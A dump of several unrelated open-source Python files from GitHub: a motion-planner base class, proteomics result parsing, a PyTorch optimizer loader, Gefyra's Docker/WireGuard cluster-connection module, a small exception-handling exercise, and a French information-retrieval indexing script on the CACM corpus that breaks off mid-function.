running_time: the overall running time\n 3. num_collision_check: the number of collision checking during the planning\n 4. num_node: the number of sampled nodes\n '''\n if isinstance(env, StaticEnv):\n assert env.state_fp(start) and env.state_fp(goal)\n elif isinstance(env, DynamicEnv):\n assert env.state_fp(start,0) and env.state_fp(goal,-1)\n\n self.t0 = perf_counter()\n try:\n result = self._plan(env, start, goal, timeout, **kwargs)\n except TimeOutException:\n result = self._catch_timeout(env, start, goal, timeout, **kwargs)\n assert isinstance(result, DotDict)\n assert 'solution' in result.keys()\n result.running_time = perf_counter() - self.t0\n result.num_collision_check = env.robot.collision_check_count\n result.num_node = self._num_node()\n return result\n\n def check_timeout(self, timeout):\n '''\n a function that needs to be called consistently during the planning\n ensure that the planner will be terminated when timeout happens\n '''\n if timeout[0] == 'time':\n if (perf_counter() - self.t0) > timeout[1]:\n raise TimeOutException(\"Timeout - planner fails to find a solution.\")\n else:\n return False\n elif timeout[0] == 'node':\n if self._num_node() > timeout[1]:\n raise TimeOutException(\"Timeout - planner fails to find a solution.\") \n else:\n return False \n\n @abstractmethod\n def _plan(self, env, start, goal, timeout, **kwargs):\n '''\n return an instance of DotDict with:\n 1. solution: a list of waypoints. if there is no solution found, the value is None\n '''\n raise NotImplementedError\n \n @abstractmethod\n def _num_node(self):\n '''\n return the number of sampled nodes\n '''\n raise NotImplementedError\n\n def _catch_timeout(self, env, start, goal, timeout, **kwargs):\n '''\n return an instance of DotDict\n '''\n return create_dot_dict(solution=None)","repo_name":"aaucsd/lemp","sub_path":"planner/abstract_planner.py","file_name":"abstract_planner.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"35161651045","text":"import re\nimport xml.dom.minidom\nfrom xml.dom.minidom import parse\nimport re\nimport os\nimport operator\nimport numpy as np\nimport chardet\n\n\n# read experiment design file\ndef experiment_design(experiment_design_file):\n exp = {}\n f = open(experiment_design_file, 'rb')\n data = f.read()\n file_encoding = chardet.detect(data).get('encoding')\n f.close()\n with open(experiment_design_file, encoding = file_encoding) as fi:\n for line in fi:\n if not line.startswith(\"File\"):\n li = line.strip('\\n').split('\\t')\n filex = li[0]\n expx = li[1]\n fracx = li[2]\n masicx = li[3]\n if expx not in exp:\n exp[expx] = [[filex, masicx]]\n else:\n exp[expx].append([filex, masicx])\n return exp\n\n\n# get the lowest score of FDR filter\ndef get_i(li):\n j = 0.0\n for i in range(1, len(li)):\n s2 = li[i].strip().split('\\t')\n if s2[5] == '1':\n j = j + 1\n fdr = j / i\n if fdr >= 0.01:\n x = float(s2[3])\n return x\n return 0\n\n#####################################################\n#######################################################\n###############################################################\n\n# MASIC ANALYSE\ndef masic_analyse_TMT(filey):\n fi = open(filey)\n line1 = fi.readline().strip('\\n').split('\\t')\n matrix = {}\n exp_num = []\n exp = []\n for i, title in enumerate(line1):\n if re.search('Ion_[\\d\\.]+$', title):\n exp_num.append(i)\n exp.append(title)\n\n for line in fi:\n li = line.strip('\\n').split('\\t')\n scan_num = li[1]\n Ion_inten = li[exp_num[0]: exp_num[-1] + 1]\n matrix[scan_num] = dict(zip(exp, Ion_inten))\n\n return matrix, exp\n\n\ndef masic_analyse_label_free(filey):\n fi = open(filey)\n line1 = fi.readline().strip('\\n').split('\\t')\n matrix = {}\n for i, title in enumerate(line1):\n if title == \"FragScanNumber\":\n scan = i\n elif title == \"PeakArea\":\n inten = i\n for line in fi:\n lines = line.strip('\\n').split('\\t')\n matrix[lines[scan]] = float(lines[inten])\n return matrix\n\n\n# get specified intensity of one peptide in specified channle\ndef merge(masic_matrix, ids, is_labeled, exp=\"null\"):\n inten = 0\n if is_labeled == 1:\n for idx in ids:\n inten = float(masic_matrix[str(idx)][exp]) + inten\n\n else:\n #for idx in ids:\n #inten = float(masic_matrix[str(idx)]) + inten\n inten = np.mean([float(masic_matrix[str(idx)]) for idx in ids])\n return inten\n\n#####################################################\n#######################################################\n###############################################################\n\ndef tandem_analyse(filex, main_path):\n tree = xml.dom.minidom.parse(filex)\n root = tree.documentElement\n source = root.getAttribute('label')\n p = re.compile(r':reversed$')\n fo = open(main_path + \"/temp/\" + 'analyse.txt', 'w')\n fo.write('group_id' + '\\t' + 'expect' + '\\t' + 'pep_sumI' +\n '\\t' + 'hyperscore' + '\\t' + 'seq' + '\\t' + 'isReversed' + '\\t' + 'scan' + '\\n')\n\n for node in root.childNodes:\n if node.nodeType != 3 and node.getAttribute('type') == 'model':\n pep_sumI = node.getAttribute('sumI')\n group_id = node.getAttribute('id')\n group_expect = node.getAttribute('expect')\n isReversed = 0\n protein = node.getElementsByTagName(\"protein\")\n groups = node.getElementsByTagName(\"group\")\n for pro in protein:\n peptide = pro.getElementsByTagName('domain')\n hyperscore = peptide[0].getAttribute('hyperscore')\n expect = peptide[0].getAttribute('expect')\n seq = peptide[0].getAttribute('seq')\n note = pro.getElementsByTagName('note')\n text = note[0].firstChild.data\n if p.search(text) == None:\n pass\n else:\n isReversed = 1\n break\n for gro in groups:\n if gro.getAttribute('label') == \"fragment ion mass spectrum\":\n note2 = gro.getElementsByTagName('note')\n scan_info = note2[0].firstChild.data\n scan_num = re.search(\"scan=(\\d+).*\", scan_info).group(1)\n\n fo.write(group_id + '\\t' + expect + '\\t' + pep_sumI +\n '\\t' + hyperscore + '\\t' + seq + '\\t' + str(isReversed) + '\\t' + scan_num + '\\n')\n\n fo.close()\n\n fi2 = open(main_path + \"/temp/\" + 'analyse.txt', 'r')\n fo2 = open(main_path + \"/temp/\" + 'res.txt', 'w')\n lines1 = fi2.readlines()\n dic = {}\n dic2 = {}\n for i in range(1, len(lines1)):\n s1 = lines1[i].strip().split('\\t')\n m = s1[0]\n dic2[i] = m\n dic[m] = float(s1[3])\n sorted_dic = sorted(dic.items(), key=operator.itemgetter(1), reverse=True)\n fo2.write(lines1[0])\n for i in sorted_dic:\n for j in dic2:\n if i[0] == dic2[j]:\n fo2.write(lines1[j])\n break\n fi2.close()\n fo2.close()\n filename_in = \"FDR_output.txt\"\n fi3 = open(main_path + \"/temp/\" + 'res.txt', 'r')\n #fo3 = open(main_path + \"/temp/\" + 'test_' + filename_in, 'w')\n lines2 = tuple(fi3.readlines())\n score = get_i(lines2)\n fi3.close()\n matrix = {}\n\n for i in lines1:\n s3 = i.strip().split('\\t')\n if i.strip().split('\\t')[0] != 'group_id' and s3[5] == '0' and float(s3[3]) > score:\n seq = s3[4]\n scan = s3[6]\n if seq not in matrix:\n matrix[seq] = {\"scan\": [scan]}\n else:\n matrix[seq][\"scan\"].append(scan)\n\n return matrix\n\n#####################################################\n#######################################################\n###############################################################\n\ndef tandem_matrix_analyse(filein, is_labeled, main_path):\n path_temp = main_path + \"/temp/\"\n if not os.path.exists(path_temp):\n os.mkdir(path_temp)\n matrix = {}\n exp_des = experiment_design(filein)\n if is_labeled == 1:\n for exp_l in exp_des:\n channel = []\n for frac in exp_des[exp_l]:\n tandem_file = frac[0]\n masic_file = frac[1]\n tandem_output_trans = tandem_analyse(tandem_file, main_path)\n masic_output_trans_all = masic_analyse_TMT(masic_file)\n masic_output_trans = masic_output_trans_all[0]\n if len(channel) == 0:\n channel = masic_output_trans_all[1]\n for expx in channel:\n exp_name = expx + \"_\" + exp_l\n if exp_name not in matrix:\n matrix[exp_name] = {}\n\n for peptide in tandem_output_trans:\n s_num = tuple(tandem_output_trans[peptide][\"scan\"])\n for expy in channel:\n if peptide not in matrix[expy + \"_\" + exp_l]:\n matrix[expy + \"_\" + exp_l][peptide] = merge(masic_output_trans, s_num, 1, expy)\n else:\n matrix[expy + \"_\" + exp_l][peptide] += merge(masic_output_trans, s_num, 1, expy)\n\n else:\n for exp_l in exp_des:\n if exp_l not in matrix:\n matrix[exp_l] = {}\n for frac in exp_des[exp_l]:\n tandem_file = frac[0]\n masic_file = frac[1]\n tandem_output_trans = tandem_analyse(tandem_file, main_path)\n masic_output_trans = masic_analyse_label_free(masic_file)\n for peptide in tandem_output_trans:\n s_num = tuple(tandem_output_trans[peptide][\"scan\"])\n if peptide not in matrix[exp_l]:\n matrix[exp_l][peptide] = merge(masic_output_trans, s_num, 0)\n else:\n matrix[exp_l][peptide] += merge(masic_output_trans, s_num, 0)\n\n return matrix\n","repo_name":"MAlinkous/test","sub_path":"readTandemResults.py","file_name":"readTandemResults.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6774734631","text":"from typing import Dict, Iterable\nimport torch\nimport torch.optim as optim\n\ndef deserializeOptimizer(learnables: Iterable[torch.Tensor], params: Dict):\n name = params['name']\n alpha = params['alpha']\n\n if name == 'ADAM':\n b1 = params['beta1']\n b2 = params['beta2']\n\n return optim.Adam(learnables, lr=alpha, betas=(b1, b2))\n\n if name == 'RMSProp':\n b = params['beta']\n\n return optim.RMSprop(learnables, lr=alpha, alpha=b)\n\n if name == 'SGD':\n return optim.SGD(learnables, lr=alpha)\n\n raise NotImplementedError()\n","repo_name":"andnp/single-hyperparameter-benchmark","sub_path":"paper/src/agents/Network/serialize.py","file_name":"serialize.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19340413178","text":"import base64\nimport logging\nimport os\nfrom pathlib import Path\nimport socket\nimport time\n\nfrom typing import IO, List, Optional, TYPE_CHECKING\nfrom gefyra.api.clients import get_client\nfrom gefyra.exceptions import GefyraConnectionError\nfrom gefyra.local.minikube import detect_minikube_config\nfrom .utils import stopwatch\n\nif TYPE_CHECKING:\n from docker.models.networks import Network\n\n\nfrom gefyra.configuration import ClientConfiguration, get_gefyra_config_location\nfrom gefyra.local.cargo import (\n create_wireguard_config,\n get_cargo_ip_from_netaddress,\n probe_wireguard_connection,\n)\nfrom gefyra.local.networking import get_or_create_gefyra_network, handle_remove_network\nfrom gefyra.local.utils import (\n compose_kubeconfig_for_serviceaccount,\n handle_docker_get_or_create_container,\n)\nfrom gefyra.types import GefyraClientConfig, GefyraClientState, GefyraConnectionItem\n\n\nlogger = logging.getLogger(__name__)\n\n\n@stopwatch\ndef connect( # noqa: C901\n connection_name: str,\n client_config: Optional[IO],\n minikube_profile: Optional[str] = None,\n probe_timeout: int = 60,\n) -> bool:\n import kubernetes\n import docker\n\n cargo_container = None\n # if this connection already exists, just restore it\n if connection_name in [conns.name for conns in list_connections()]:\n logger.debug(f\"Restoring exinsting connection {connection_name}\")\n config = ClientConfiguration(connection_name=connection_name)\n cargo_container = config.DOCKER.containers.get(config.CARGO_CONTAINER_NAME)\n client = get_client(config.CLIENT_ID, connection_name=config.CONNECTION_NAME)\n else:\n # connection does not exist, so create it\n if client_config is None:\n raise GefyraConnectionError(\n \"Connection is not yet created and no client configuration has been provided.\"\n )\n logger.debug(f\"Creating new connection {connection_name}\")\n file_str = client_config.read()\n client_config.close()\n gclient_conf = GefyraClientConfig.from_json_str(file_str)\n client = get_client(gclient_conf.client_id, connection_name=connection_name)\n loc = os.path.join(\n get_gefyra_config_location(),\n f\"{connection_name}.yaml\",\n )\n # this kubeconfig is being used by the client to operate in the cluster\n kubeconfig_str = compose_kubeconfig_for_serviceaccount(\n gclient_conf.kubernetes_server,\n gclient_conf.ca_crt,\n \"gefyra\",\n base64.b64decode(gclient_conf.token).decode(\"utf-8\"),\n )\n with open(loc, \"w\") as f:\n f.write(kubeconfig_str)\n logger.info(f\"Client kubeconfig saved to {loc}\")\n\n if minikube_profile:\n logger.debug(f\"Minikube profile detected: {minikube_profile}\")\n mini_conf = detect_minikube_config(minikube_profile)\n logger.debug(mini_conf)\n gclient_conf.gefyra_server = (\n f\"{mini_conf['cargo_endpoint_host']}:{mini_conf['cargo_endpoint_port']}\"\n )\n\n config = ClientConfiguration(\n connection_name=connection_name,\n kube_config_file=Path(loc),\n client_id=gclient_conf.client_id,\n cargo_endpoint_host=gclient_conf.gefyra_server.split(\":\")[0],\n cargo_endpoint_port=gclient_conf.gefyra_server.split(\":\")[1],\n cargo_container_name=f\"gefyra-cargo-{connection_name}\",\n )\n config.CARGO_PROBE_TIMEOUT = probe_timeout\n\n _retry = 0\n while _retry < 5:\n gefyra_network = get_or_create_gefyra_network(config)\n try:\n client.activate_connection(\n gefyra_network.attrs[\"IPAM\"][\"Config\"][0][\"Subnet\"]\n )\n break\n except kubernetes.client.exceptions.ApiException as e:\n if e.status == 500:\n logger.debug(f\"Could not activate connection, retrying {_retry}/5...\")\n # if the given subnet is taken in the cluster (by another client), recreate the network and try again\n # hopefully the IPAM config will give a new subnet\n gefyra_network.remove()\n else:\n raise GefyraConnectionError(\"Could not activate connection\") from None\n\n # busy wait for the client to enter the ACTIVE state\n _i = 0\n while _i < config.CONNECTION_TIMEOUT:\n if client.state == GefyraClientState.ACTIVE:\n break\n else:\n _i += 1\n time.sleep(0.5)\n else:\n raise GefyraConnectionError(\"Could not activate connection\") from None\n client.update()\n\n # since this connection was (re)activated, save the current wireguard config (again)\n wg_conf = os.path.join(\n get_gefyra_config_location(), f\"{config.CONNECTION_NAME}.conf\"\n )\n if not client.provider_config:\n raise GefyraConnectionError(\n \"Could not get provider config for client\"\n ) from None\n\n if config.CARGO_ENDPOINT is None:\n config.CARGO_ENDPOINT = client.provider_config.pendpoint\n logger.debug(config.CARGO_ENDPOINT)\n # busy wait to resolve the cargo endpoint, making sure it's actually resolvable from this host\n _i = 0\n while _i < config.CONNECTION_TIMEOUT:\n try:\n socket.gethostbyname_ex(config.CARGO_ENDPOINT.split(\":\")[0])\n break\n except (socket.gaierror, socket.herror): # [Errno -2] Name or service not known\n logger.debug(\n f\"Could not resolve host '{config.CARGO_ENDPOINT.split(':')[0]}', \"\n f\"retrying {_i}/{config.CONNECTION_TIMEOUT}...\"\n )\n _i += 1\n time.sleep(1)\n else:\n raise GefyraConnectionError(\n f\"Cannot resolve host '{config.CARGO_ENDPOINT.split(':')[0]}'.\"\n ) from None\n\n with open(wg_conf, \"w\") as f:\n f.write(\n create_wireguard_config(\n client.provider_config, config.CARGO_ENDPOINT, config.WIREGUARD_MTU\n )\n )\n\n cargo_ip_address = get_cargo_ip_from_netaddress(\n gefyra_network.attrs[\"IPAM\"][\"Config\"][0][\"Subnet\"]\n )\n\n try:\n if not cargo_container:\n cargo_container = handle_docker_get_or_create_container(\n config,\n f\"{config.CARGO_CONTAINER_NAME}\",\n config.CARGO_IMAGE,\n detach=True,\n cap_add=[\"NET_ADMIN\"],\n privileged=True,\n volumes=[\n \"/var/run/docker.sock:/var/run/docker.sock\",\n f\"{wg_conf}:/config/wg0.conf\",\n ],\n pid_mode=\"host\",\n )\n\n if minikube_profile:\n mini_conf = detect_minikube_config(minikube_profile)\n if mini_conf[\"network_name\"]:\n logger.debug(\"Joining minikube network\")\n minikube_net: \"Network\" = config.DOCKER.networks.get(\n mini_conf[\"network_name\"]\n )\n minikube_net.connect(cargo_container)\n logger.debug(f\"Cargo gefyra net ip address: {cargo_ip_address}\")\n gefyra_network.connect(cargo_container, ipv4_address=cargo_ip_address)\n cargo_container.start()\n time.sleep(1)\n except docker.errors.APIError as e:\n try:\n cargo_container and cargo_container.remove()\n except docker.errors.APIError:\n pass\n raise GefyraConnectionError(f\"Could not start Cargo container: {e}\") from None\n\n # Confirm the wireguard connection working\n logger.debug(\"Checking wireguard connection\")\n probe_wireguard_connection(config)\n return True\n\n\n@stopwatch\ndef disconnect(connection_name: str) -> bool:\n import docker\n\n config = ClientConfiguration(connection_name=connection_name)\n client = get_client(config.CLIENT_ID, connection_name=connection_name)\n get_or_create_gefyra_network(config)\n try:\n cargo_container = config.DOCKER.containers.get(\n f\"{config.CARGO_CONTAINER_NAME}\",\n )\n cargo_container.stop()\n except docker.errors.NotFound:\n pass\n client.deactivate_connection()\n return True\n\n\n@stopwatch\ndef list_connections() -> List[GefyraConnectionItem]:\n from gefyra.local import CARGO_LABEL, CONNECTION_NAME_LABEL, VERSION_LABEL\n\n config = ClientConfiguration()\n result = []\n containers = config.DOCKER.containers.list(\n all=True, filters={\"label\": f\"{CARGO_LABEL[0]}={CARGO_LABEL[1]}\"}\n )\n for cargo_container in containers:\n if cargo_container.status == \"running\":\n try:\n config = ClientConfiguration(cargo_container_name=cargo_container.name)\n config.CARGO_PROBE_TIMEOUT = 1 # don't wait too long for the probe\n probe_wireguard_connection(config)\n state = \"running\"\n except GefyraConnectionError:\n state = \"error\"\n else:\n state = \"stopped\"\n result.append(\n GefyraConnectionItem(\n **{\n \"name\": cargo_container.labels.get(\n CONNECTION_NAME_LABEL, \"unknown\"\n ),\n \"version\": cargo_container.labels.get(VERSION_LABEL, \"unknown\"),\n \"created\": cargo_container.attrs.get(\"Created\", \"unknown\"),\n \"status\": state,\n }\n )\n )\n return result\n\n\n@stopwatch\ndef remove_connection(connection_name: str):\n import docker\n\n config = ClientConfiguration(connection_name=connection_name)\n try:\n get_client(\n config.CLIENT_ID, connection_name=connection_name\n ).deactivate_connection()\n except Exception as e: # noqa E722\n logger.debug(e)\n pass\n try:\n cargo_container = config.DOCKER.containers.get(\n f\"{config.CARGO_CONTAINER_NAME}\",\n )\n cargo_container.remove(force=True)\n except docker.errors.NotFound:\n pass\n handle_remove_network(config)\n try:\n # remove kubeconfig file\n os.remove(os.path.join(get_gefyra_config_location(), f\"{connection_name}.yaml\"))\n except OSError:\n pass\n try:\n # remove wireguard config file\n os.remove(\n os.path.join(get_gefyra_config_location(), f\"{config.CONNECTION_NAME}.conf\")\n )\n except OSError:\n pass\n","repo_name":"gefyrahq/gefyra","sub_path":"client/gefyra/api/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":10466,"program_lang":"python","lang":"en","doc_type":"code","stars":575,"dataset":"github-code","pt":"72"} +{"seq_id":"69948853992","text":"n = 0\r\ntry:\r\n x = int(input(\"Nhập x: \"))\r\n y = int(input(\"Nhập y: \"))\r\n #có thể ném lỗi cụ thể \r\n if y==0:\r\n raise ZeroDivisionError(\"không chấp nhận y=0\")\r\n if x%2 !=0:\r\n raise Exception(\"Bạn phải nhập số x chẵn\")\r\n n = x/y\r\nexcept NameError as err1: \r\n print(\"Lỗi 1: \", err1)\r\nexcept ZeroDivisionError as err2:\r\n print(\"Lỗi: \", err2)\r\nexcept ValueError as err3: \r\n print(\"Lỗi 3: Bạn phải nhập số\")\r\nexcept Exception as err3: #Lỗi chung luôn nằm sau cùng, nằm sau các lỗi cụ thể\r\n print(\"Lỗi: \", err3)\r\n\r\nprint(\"n = \", n)","repo_name":"ttri1507/python_basic","sub_path":"Bai_10_raise.py","file_name":"Bai_10_raise.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13332634425","text":"import nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk import word_tokenize\r\nimport os,sys,re,copy,time\r\nimport operator\r\nimport pickle\r\nfrom math import *\r\nimport numpy\r\nimport codecs\r\n\r\n\r\nposition = os.path.dirname(os.path.abspath(__file__))\r\nbaseFilePath=\"C:\\\\Users\\\\PC\\\\Desktop\\\\TPRI\\\\ProjetRI\\\\cacm\\\\\"\r\ntableFrequences = {}\r\ntableFichierInverse = {}\r\ntableFrequencesPondere={}\r\ntableInversePondere = {}\r\nmaxFreqTable = {}\r\nstopWordsIndex = {}\r\nmatriceAppariment=None\r\ntempsDeConstruction={}\r\ntempsExecution={}\r\n\r\ndef ExtraireInformations(NomF):\r\n TabContenuDocs = nltk.defaultdict(str)\r\n fichier = open(NomF, 'r')\r\n Lignes = fichier.readlines()\r\n i = 0\r\n NumDoc = 0\r\n\r\n while(i < len(Lignes)):\r\n Ligne = Lignes[i]\r\n if Ligne.startswith('.I'):\r\n NumDoc = int(Ligne.split()[1])\r\n\r\n if Ligne.startswith('.T'):\r\n i += 1\r\n contenuDoc = \"\"\r\n while(((nltk.re.findall('\\.([TWBANX]\\n|I [0-9]+\\n)', Lignes[i]) == [])) and (i < len(Lignes))):\r\n mots = Lignes[i].split() # word_tokenize(Lignes[i])\r\n for mot in mots:\r\n if len(mot) > 1 and acess(mot) is None:\r\n contenuDoc = contenuDoc+\" \"+mot.lower()\r\n\r\n i += 1\r\n #contenuDoc = contenuDoc[1:]\r\n TabContenuDocs[NumDoc] = contenuDoc\r\n i -= 1\r\n\r\n if Ligne.startswith('.W'):\r\n i += 1\r\n contenuDoc = \"\"\r\n while(((nltk.re.findall('\\.([TWBANX]\\n|I [0-9]+\\n)', Lignes[i]) == [])) and (i < len(Lignes))):\r\n mots = Lignes[i].split() # word_tokenize(Lignes[i])\r\n for mot in mots:\r\n if len(mot) > 1 and acess(mot) == None:\r\n contenuDoc = contenuDoc+\" \"+mot.lower()\r\n\r\n\r\n i += 1\r\n #contenuDoc = contenuDoc[1:]\r\n TabContenuDocs[NumDoc] = TabContenuDocs[NumDoc]+contenuDoc\r\n\r\n i -= 1\r\n\r\n i += 1\r\n \r\n return TabContenuDocs\r\n\r\n\r\ndef construireTableFreq(nomF):\r\n debut=time.time()\r\n tableContenu = ExtraireInformations(nomF)\r\n global tableFrequences\r\n global tempsDeConstruction\r\n for doc, listeMots in tableContenu.items():\r\n frequences = {}\r\n tab = nltk.tokenize.word_tokenize(listeMots)\r\n tab=[el for el in tab if el not in '[ ( ) ! \\ ? . ; , - - : / \\' \\ * \\ + \\ - ]'.split(' ') ]\r\n tab=[re.sub(\"[\\\"'\\.,:\\)\\(\\?!<>-]+$\",\"\",el) for el in tab]\r\n tab=[re.sub(\"^[\\\"'\\.,:\\)\\(\\?!<>-]+\",\"\",el) for el in tab]\r\n for mot in tab:\r\n if len(mot)>1 and not acess(mot):\r\n if not mot in frequences:\r\n frequences[mot] = 0\r\n frequences[mot] += 1\r\n\r\n tableFrequences[int(doc)] = frequences\r\n fin=time.time()\r\n tempsDeConstruction[\"TableFreq\"]=fin-debut\r\n sauvegarder_obj(tableFrequences,\"tableFrequences\")\r\n sauvegarder_json(tableFrequences,\"tableFrequences\")\r\n \r\n print(\"Temps de la constructionde l'index des fréquences : \",(fin-debut),\" seconds.\")\r\n\r\n return tableFrequences \r\n\r\n\r\ndef construireFichierInverse():\r\n global tableFichierInverse\r\n global tableFrequences\r\n global baseFilePath\r\n global tempsDeConstruction\r\n debut=time.time()\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n print(\"ConstruireFichierInverse : table fréquence non trouvée sur disque. Reconstruction . . .\")\r\n tableFrequences=construireTableFreq(baseFilePath+\"cacm.all\")\r\n \r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\") \r\n \r\n for doc in tableFrequences:\r\n for mot, freq in tableFrequences[doc].items():\r\n if not mot.lower() in tableFichierInverse:\r\n tableFichierInverse[mot.lower()] = []\r\n tableFichierInverse[mot.lower()].append([doc, freq])\r\n fin=time.time()\r\n tempsDeConstruction[\"FichierInverse\"]=fin-debut\r\n sauvegarder_obj(tableFichierInverse,\"fichierInverse\")\r\n sauvegarder_json(tableFichierInverse,\"fichierInverse\")\r\n print(\"Temps de la constructionde du Ficher inverse : \",(fin-debut),\" seconds.\")\r\n return tableFichierInverse \r\n\r\n\r\ndef getFrequences(doc):\r\n global tableFrequences\r\n doc=str(doc)\r\n doc=doc.lower()\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n print(\"GetFrequences : table fichier inversé non trouvée sur disque. Reconstruction . . .\")\r\n tableFrequences=construireTableFreq()\r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\")\r\n\r\n if type(next(iter(tableFrequences)))==type(2):\r\n doc=int(doc)\r\n if doc not in tableFrequences:\r\n print(\"None value\")\r\n return None\r\n \r\n frequences = {}\r\n \r\n for term,freq in tableFrequences[doc].items():\r\n frequences[term] = freq\r\n\r\n return frequences\r\n\r\n\r\ndef getOccurences(term):\r\n\r\n if term not in tableFichierInverse:\r\n return None\r\n occurences = {}\r\n for occurence in tableFichierInverse[term]:\r\n occurences[occurence[0]] = occurence[1]\r\n\r\n return occurences\r\n\r\n\r\ndef getMaxFrequence(doc):\r\n global tableFrequences\r\n max = 0\r\n for term, freq in tableFrequences[doc].items():\r\n if freq > max:\r\n max = freq\r\n\r\n return max\r\n\r\ndef calculerTousMaxes(maxesDict):\r\n global tableFrequences\r\n \r\n for doc in tableFrequences.keys():\r\n maxesDict[int(doc)]=getMaxFrequence(doc)\r\n\r\n return maxesDict \r\n\r\n\r\ndef calculerNi(term):\r\n global tableFichierInverse\r\n if not os.path.exists('objets\\\\fichierInverse.txt'):\r\n print(\"Calcul Ni : table fichier inversé non trouvée sur disque. Reconstruction . . .\")\r\n tableFichierInverse=construireFichierInverse()\r\n if not bool(tableFichierInverse):\r\n tableFichierInverse=charger_obj(\"fichierInverse\")\r\n ni = 0\r\n \r\n for liste in tableFichierInverse[term.lower()]:\r\n ni += liste[1]\r\n\r\n return ni\r\n\r\n\r\ndef construireTableFrequencesPondere():\r\n global tableFrequences\r\n global tableFrequencesPondere\r\n global tempsDeConstruction\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n print(\"ConstruireTFreqPondéré : table fréquence non trouvée sur disque. Reconstruction . . .\")\r\n tableFrequences=construireTableFreq(baseFilePath+\"cacm.all\")\r\n \r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\")\r\n \r\n debut=time.time()\r\n tableFrequencesPondere = tableFrequences.copy()\r\n maxes = {}\r\n N=len(tableFrequencesPondere)\r\n for doc,frequences in tableFrequencesPondere.items():\r\n maxes[doc] = getMaxFrequence(doc)\r\n for term,freq in frequences.items():\r\n \r\n ni = calculerNi(term)\r\n \r\n\r\n tableFrequencesPondere[doc][term] = float(\r\n (freq/maxes[doc]) * numpy.log10((float(N)/ni)+1))\r\n fin=time.time()\r\n tempsDeConstruction[\"IndexPondere\"]=fin-debut \r\n sauvegarder_json(tableFrequencesPondere,\"tableFrequencesPondere\")\r\n sauvegarder_obj(tableFrequencesPondere,\"tableFrequencesPondere\")\r\n \r\n print(\"Temps de la constructionde de l'index pondéré : \",(fin-debut),\" seconds.\")\r\n return tableFrequencesPondere\r\n\r\ndef construireFichierInversePondere():\r\n global tableFichierInverse\r\n global tableFrequences\r\n global tableInversePondere\r\n global tempsDeConstruction\r\n debut=time.time()\r\n if not os.path.exists('objets\\\\fichierInverse.txt'):\r\n print(\"ConstruireFIPondéré : table fichier inversé non trouvée sur disque. Reconstruction . . .\")\r\n tableFichierInverse=construireFichierInverse()\r\n\r\n if not bool(tableFichierInverse):\r\n tableFichierInverse=charger_obj(\"fichierInverse\")\r\n\r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\") \r\n\r\n \r\n tableInversePondere = copy.deepcopy(tableFichierInverse)\r\n maxes = {}\r\n maxes=calculerTousMaxes(maxes)\r\n \r\n N=len(tableFrequences)\r\n for term, listeOccurences in tableFichierInverse.items():\r\n i=0\r\n listeNi={} # si un terme apparait K fois avec la même fréquence, pas la peinde de la recalculer\r\n for liste in listeOccurences:\r\n \r\n doc = liste[0]\r\n if not liste[1] in listeNi:\r\n ni = calculerNi(term)\r\n listeNi[liste[1]]=ni \r\n else:\r\n ni=listeNi[liste[1]]\r\n\r\n tableInversePondere[term][i][1] = float(\r\n (liste[1]/maxes[doc]) * numpy.log10((float(N)/ni)+1))\r\n i+=1 \r\n fin=time.time()\r\n tempsDeConstruction[\"fichierInversePondere\"]=fin-debut\r\n sauvegarder_json(tableInversePondere,\"fichierInversePondere\")\r\n sauvegarder_obj(tableInversePondere,\"fichierInversePondere\")\r\n print(\"Temps de la constructionde du Ficher inverse pondéré: \",(fin-debut),\" seconds.\")\r\n return tableInversePondere\r\n\r\n\r\ndef construireIndexMotsVides():\r\n global stopWordsIndex\r\n global tempsDeConstruction\r\n debut=time.time()\r\n listMotsVides = stopwords.words('english') # text.split('\\n')\r\n for ligne in listMotsVides:\r\n if str(ligne.lower()[0]) not in stopWordsIndex:\r\n stopWordsIndex[str(ligne.lower()[0])] = []\r\n\r\n stopWordsIndex[str(ligne.lower()[0])].append(ligne)\r\n fin=time.time()\r\n tempsDeConstruction[\"indexStopWords\"]=fin-debut\r\n # fichierMotsVides.close()\r\n\r\n return stopWordsIndex\r\n\r\ndef acess(motVide):\r\n global stopWordsIndex\r\n if not bool(stopWordsIndex):\r\n stopWordsIndex=construireIndexMotsVides()\r\n if not str(motVide.lower()[0]) in stopWordsIndex:\r\n return None\r\n for element in stopWordsIndex[str(motVide.lower()[0])]:\r\n if element.lower() == motVide.lower():\r\n return True\r\n return None\r\n\r\ndef sauvegarderTableFrequences():\r\n global tableFrequences\r\n # print(tableFrequences)\r\n buffer = \"\"\r\n for doc in tableFrequences.keys():\r\n ligne = \"\"+str(doc)+\"--> {\"\r\n for term, freq in tableFrequences[doc].items():\r\n ligne += \"<\"+term+\", \"+str(freq)+\">,\"\r\n\r\n ligne = ligne[:len(ligne)-1]\r\n ligne += \"}\"\r\n # print(ligne)\r\n buffer += ligne+\"\\n\"\r\n\r\n f = open(os.path.join(position, \"objets/tableFrequences.txt\"), \"w\")\r\n f.write(buffer)\r\n f.close()\r\n\r\n\r\n\r\n\r\ndef sauvegarder_obj(obj, name):\r\n with open(os.path.join(position+\"\\\\objets\", name) + '.pkl', 'wb') as f:\r\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\r\n\r\n\r\ndef charger_obj(name):\r\n with open(os.path.join(position+\"\\\\objets\", name) + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\ndef sauvegarder_json(dictionary, name):\r\n import json\r\n with open(os.path.join(position+\"\\\\objets\", name) + '.txt', 'w') as f:\r\n 